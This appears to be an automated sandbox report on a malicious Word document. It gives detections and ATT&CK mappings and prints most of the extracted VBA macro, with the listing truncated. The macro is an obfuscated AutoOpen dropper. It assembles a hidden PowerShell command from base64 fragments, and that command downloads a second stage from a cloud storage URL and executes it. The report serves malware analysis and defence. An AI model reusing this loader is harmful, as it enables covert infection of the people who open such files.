MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file contains a legacy WordBasic AutoOpen macro that attempts to execute obfuscated PowerShell code. The script concatenates several strings to form a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6458367-0' further supports its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6458367-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6458367-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6046 bytes |
SHA-256: 7084a7102b3017f4dfd7522151f9321659834d3cdc31a6950cc05e87ab47e8b3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wrap"
Sub AutoOpen()
Dim JR_PA As String
JP_SE = Array("c", "s", "x", "p", "d", " ", "t", "n", "y", "u", "w", "i", "r", "a", "h", "b", "o", "l", "e", "-")
Dim FM_TI As String
FM_TI = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
JR_PA = JR_PA + JP_SE(3)
JR_PA = JR_PA + JP_SE(16)
Dim AO_NF As String
AO_NF = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQ"
JR_PA = JR_PA + JP_SE(10)
JR_PA = JR_PA + JP_SE(18)
Dim BN_RG As String
BN_RG = "BzAHQAZQB"
JR_PA = JR_PA + JP_SE(12)
JR_PA = JR_PA + JP_SE(1)
Dim DT_ND As String
DT_ND = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA"
JR_PA = JR_PA + JP_SE(14)
JR_PA = JR_PA + JP_SE(18)
Dim FM_ME As String
FM_ME = "DoAOgBVAFQARgA4AC4ARwBlAHQA"
AN_SG = AN_SG & FM_TI & AO_NF & BN_RG & DT_ND & FM_ME
JR_PA = JR_PA + JP_SE(17)
JR_PA = JR_PA + JP_SE(17)
Dim AK_LJ As String
AK_LJ = "UwB0AHIAaQBuAGcAK"
JR_PA = JR_PA + JP_SE(5)
JR_PA = JR_PA + JP_SE(19)
Dim HQ_PA As String
HQ_PA = "ABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgB"
JR_PA = JR_PA + JP_SE(10)
JR_PA = JR_PA + JP_SE(11)
Dim FM_NI As String
FM_NI = "lAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUAN"
JR_PA = JR_PA + JP_SE(7)
JR_PA = JR_PA + JP_SE(4)
Dim AR_OB As String
AR_OB = "gA0AFMAdAByAGkAbgBnACgAJ"
JR_PA = JR_PA + JP_SE(16)
JR_PA = JR_PA + JP_SE(10)
Dim EP_MD As String
EP_MD = "AB4ACkAKQ"
AN_SG = AN_SG & AK_LJ & HQ_PA & FM_NI & AR_OB & EP_MD
JR_PA = JR_PA + JP_SE(1)
JR_PA = JR_PA + JP_SE(6)
Dim IK_RI As String
IK_RI = "B9ADsAaQBlAHgAIAAkACgAYQAgACQAKAAkAC"
JR_PA = JR_PA + JP_SE(8)
JR_PA = JR_PA + JP_SE(17)
Dim HS_OA As String
HS_OA = "gAJAAoAGkAbgB2AG8AawBlAC0AdwBlAG"
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(5)
Dim IL_TI As String
IL_TI = "IAcgBlAHEAdQBlAHMAdAAgACcAaA"
JR_PA = JR_PA + JP_SE(14)
JR_PA = JR_PA + JP_SE(11)
Dim FM_QG As String
FM_QG = "B0AHQAcAB"
JR_PA = JR_PA + JP_SE(4)
JR_PA = JR_PA + JP_SE(4)
Dim ER_QA As String
ER_QA = "zADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuA"
AN_SG = AN_SG & IK_RI & HS_OA & IL_TI & FM_QG & ER_QA
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(7)
Dim DQ_NH As String
DQ_NH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
JR_PA = JR_PA + JP_SE(5)
JR_PA = JR_PA + JP_SE(19)
Dim JL_OH As String
JL_OH = "BpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad"
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(2)
Dim GT_PF As String
GT_PF = "QBzAGUAP"
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(0)
Dim AP_KB As String
AP_KB = "wAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG"
JR_PA = JR_PA + JP_SE(9)
JR_PA = JR_PA + JP_SE(6)
Dim JS_SF As String
JS_SF = "4ASwBlAHkAJQ"
AN_SG = AN_SG & DQ_NH & JL_OH & GT_PF & AP_KB & JS_SF
JR_PA = JR_PA + JP_SE(11)
JR_PA = JR_PA + JP_SE(16)
Dim BN_QD As String
BN_QD = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdAB"
JR_PA = JR_PA + JP_SE(7)
JR_PA = JR_PA + JP_SE(3)
Dim FL_KF As String
FL_KF = "hAGcAZQAlADIANwAmACQAUwBlAGwAZQBjAHQAPQBkA"
JR_PA = JR_PA + JP_SE(16)
JR_PA = JR_PA + JP_SE(17)
Dim DT_OB As String
DT_OB = "GEAdABhACYAcwB2AD0"
JR_PA = JR_PA + JP_SE(11)
JR_PA = JR_PA + JP_SE(0)
Dim AN_KB As String
AN_KB = "AMgAwADEANwAtADAANAAtADEANwAmAHMAcw"
JR_PA = JR_PA + JP_SE(8)
JR_PA = JR_PA + JP_SE(5)
Dim EL_TB As String
EL_TB = "A9AGIAZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0A"
AN_SG = AN_SG & BN_QD & FL_KF & DT_OB & AN_KB & EL_TB
JR_PA = JR_PA + JP_SE(15)
JR_PA = JR_PA + JP_SE(8)
Dim JQ_LB As String
JQ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.